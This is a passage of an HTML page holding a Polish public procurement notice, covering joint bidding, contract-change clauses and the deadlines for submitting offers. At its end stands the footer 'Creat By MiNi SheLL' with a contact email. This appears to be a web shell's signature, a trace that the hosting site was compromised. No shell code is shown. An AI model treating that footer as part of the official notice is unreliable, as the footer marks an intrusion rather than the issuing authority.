dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie przedmiotowego zamówienia. W takim<br/>przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego zgodnie z art. 58 ust. 2 ustawy PZP:1.1. Pełnomocnikiem może być<br/>jeden z wykonawców działających wspólnie lub osoba trzecia (np. pracownik jednego z<br/>wykonawców). 1.2. Jeżeli pełnomocnikiem pozostałych wykonawców jest wykonawca będący<br/>osobą prawną to może on działać zgodnie z ujawnionymi w dokumentach rejestrowych<br/>zasadami reprezentacji.2. W przypadku wspólnego ubiegania się o zamówienie przez<br/>wykonawców Oświadczenie Wstępne składa każdy z wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.3. W przypadku wykonawców ubiegających się wspólnie o udzielenie<br/>zamówieniebrak podstaw do wykluczenia z postępowania powinien wykazać każdy z<br/>wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Par. 1 pkt 4. Zamawiający zastrzega sobie prawo zakupu mniejszej ilości przedmiotu<br/>zamówienia do 30 % niż podana w Formularzu cenowo - ofertowym, w przypadku wystąpienia<br/>sytuacji trudnej do przewidzenia w chwili zawarcia umowy tj. w przypadku braku<br/>zapotrzebowania na przedmioty zamówienia objęte niniejszą umową z uwagi na ilość pacjentów<br/>leczonych na oddziałach Zamawiającego. W takim przypadku Wykonawca może żądać<br/>wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy, bez naliczania<br/>jakichkolwiek kar. Par. 2 pkt. 2 W przypadku zmiany przepisów dotyczących wysokości podatku<br/>VAT w czasie obowiązywania niniejszej umowy ceny brutto nie będące cenami urzędowymi w<br/>myśl ustawy o refundacji z dnia 12 maja 2011 r.. Ceny brutto ulegną zmianie stosownie do<br/>zmiany stawki podatku VAT, natomiast cena netto pozostanie niezmienna. Powyższe nie<br/>dotyczy przypadków, gdy Wykonawca nieprawidłowo ustalił stawki podatku VAT w ofercie, w<br/>takim wypadku skutki nieprawidłowego wskazania stawki podatku obciążają wyłącznie<br/>Wykonawcę. Nie dotyczy to przypadków zawyżenia stawki VAT w ofercie. W przypadkach<br/>wątpliwości co do wysokości stawki VAT Wykonawca obowiązany jest przedstawić<br/>Zamawiającemu urzędową interpretację właściwych organów skarbowych.Par. 9 Poza<br/>przypadkami wcześniej wymienionymi w niniejszej umowie Zamawiający przewiduje możliwość<br/>zmiany niniejszej umowy w przypadku wystąpienia sytuacji trudnej do przewidzenia w chwili<br/>zawarcia umowy tj.:1. jeżeli w czasie realizacji um. producent danego przedmiotu zamówienia<br/>zaprzestanie produkcji opakowań w zaoferowanej ilości/pojemności, Zamawiający dopuszcza<br/>zmianę ilości sztuk przedmiotu zamówienia w opakowaniu po uprzednim powiadomieniu<br/>pisemnym Zamawiającego o proponowanej zmianie i wyrażeniu zgody na taką zmianę przez<br/>Zamawiającego (po podpisaniu aneksu do umowy). W każdym przypadku zmiany ilości sztuk w<br/>opakowaniu cena jednostkowa netto w przeliczeniu proporcjonalnym tego przedmiotu<br/>zamówienia nie może ulec zmianie.2. jeżeli w czasie realizacji umowy:- producent przedmiotu<br/>zamówienia wskazanego w umowie - w nazwie handlowej, zaprzestanie jego produkcji lubprzedmiot<br/>zamówienia wskazany w umowie - w nazwie handlowej, będzie niedostępny na rynku<br/>polskim,to możliwe będzie jego zastąpienie odpowiednikiem po pisemnym powiadomieniu<br/>Zamawiającego (po podpisaniu aneksu do umowy) i wyrażeniu zgody na takie zastąpienie, z<br/>zachowaniem terminu dostawy i ceny jednostkowej netto, jak w ofercie lub ceny jednostkowej<br/>niższej. 3. jeżeli w czasie realizacji umowy zmianie ulegnie nazwa handlowa przedmiotu<br/>zamówienia objętego umową Zamawiający dopuszcza taką zmianę po uprzednim<br/>powiadomieniu pisemnym Zamawiającego o dokonanej przez producenta zmianie i wyrażeniu<br/>zgody na taką zmianę przez Zamawiającego (po podpisaniu aneksu do umowy). W każdym<br/>przypadku zmiany nazwy handlowej cena jednostkowa netto tego przedmiotu zamówienia nie<br/>może ulec zmianie w górę. 4. jeżeli w czasie realizacji um. zmianie ulegnie nazwa Wykonawcy<br/>jego stan prawny lub adres siedziby Wykonawcy Wykonawca zobowiązany jest do<br/>powiadomienia Zamawiającego o takiej zmianie i przedstawienia aneksu do Umowy wraz z<br/>aktualnym odpisem z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru,<br/>podpisanym „za zgodność z oryginałem” przez uprawnione osoby.5. jeżeli w czasie realizacji<br/>um. zmianie ulegnie nazwa Zamawiającego, jego stan prawny lub adres siedziby<br/>Zamawiającego Zamawiający zobowiązany jest do powiadomienia Wykonawcy o takiej zmianie i<br/>przedstawienia aneksu do Umowy. Par. 10 ust. 2. W przypadku niezrealizowania przedmiotu<br/>zamówienia w całości strony mogą zgodnie postanowić o przedłużeniu terminu obowiązywania<br/>niniejszej umowy do czasu całkowitego zrealizowania łącznej kwoty umowy, nie dłużej jednak<br/>niż o 3 miesiące. Przedłużeniem umowy wymaga pisemnego aneksu. Powyższe nie uchybia<br/>uprawnieniom Zamawiającego, o których mowa w § 1 ust.4. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-16 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com